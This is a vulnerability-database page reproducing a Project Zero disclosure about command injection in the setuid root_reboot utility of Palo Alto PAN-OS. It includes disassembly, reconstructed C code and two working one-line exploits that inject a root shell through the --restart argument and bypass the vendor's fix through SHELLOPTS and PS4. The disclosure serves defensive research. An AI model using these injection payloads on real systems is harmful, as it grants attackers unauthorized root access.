Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtGoogle Security Research1337DAY-ID-26361
HistoryNov 19, 2016 - 12:00 a.m.

Palo Alto Networks PanOS root_reboot - Privilege Escalation Vulnerability

2016-11-1900:00:00
Google Security Research
0day.today
23

0.001 Low

EPSS

Percentile

26.2%

JSON

Exploit for linux platform in category local exploits

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
 
The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:
 
.text:0804870F C7 44 24 04 78+                mov     dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
.text:08048717 89 04 24                       mov     [esp], eax      ; char **
.text:0804871A E8 0D FE FF FF                 call    _asprintf
.text:0804871F 8B 45 E8                       mov     eax, [ebp+new]
.text:08048722 85 C0                          test    eax, eax
.text:08048724 0F 84 B9 01 00+                jz      loc_80488E3
.text:0804872A 89 04 24                       mov     [esp], eax      ; command
.text:0804872D E8 9A FD FF FF                 call    _system
 
Which is trying to do this:
 
  if (setuid(0) < 0)
  {
    fprintf(stderr, "%s: Can't setuid to reboot system\n");
  }
  if (reason) {
   asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason);
   system(new);
   free(new);
  }
 
This is trivially exploitable, for example:
 
 
$ ls -l /usr/local/bin/root_reboot 
-rwsr-xr-x 1 root root 16275 Oct 17  2014 /usr/local/bin/root_reboot
$ root_reboot --restart '"; bash -i; echo "'
# id
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
 
Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply:
 
https://securityadvisories.paloaltonetworks.com/Home/Detail/45
 
However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this:
 
$ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)

#  0day.today [2018-02-06]  #

Related

openvas 1
nvd 1
cvelist 1
zdt 1
prion 1
cve 1
paloalto 1
nessus 1
openvas
openvas
Palo Alto PAN-OS Local Privilege Escalation (PAN-SA-2016-0034)
2016-11-21 00:00:00
nvd
nvd
CVE-2016-9151
2016-11-19 06:59:03
cvelist
cvelist
CVE-2016-9151
2016-11-19 06:29:00
zdt
zdt
Palo Alto Networks PanOS root_trace - Privilege Escalation Vulnerability
2016-11-19 00:00:00
prion
prion
Code injection
2016-11-19 06:59:00
cve
cve
CVE-2016-9151
2016-11-19 06:59:03
paloalto
paloalto
Local Privilege Escalation
2016-11-17 17:00:00
nessus
nessus
Palo Alto Networks PAN-OS 5.0.x < 5.0.20 / 5.1.x < 5.1.13 / 6.0.x < 6.0.15 / 6.1.x < 6.1.15 / 7.0.x < 7.0.11 / 7.1.x < 7.1.6 Multiple Vulnerabilities (PAN-SA-2016-0033 / PAN-SA-2016-0034 / PAN-SA-2016-0035 / PAN-SA-2016-0037)
2016-12-02 00:00:00

0.001 Low

EPSS

Percentile

26.2%

JSON
Related for 1337DAY-ID-26361
openvas1nvd1cvelist1zdt1prion1cve1paloalto1nessus1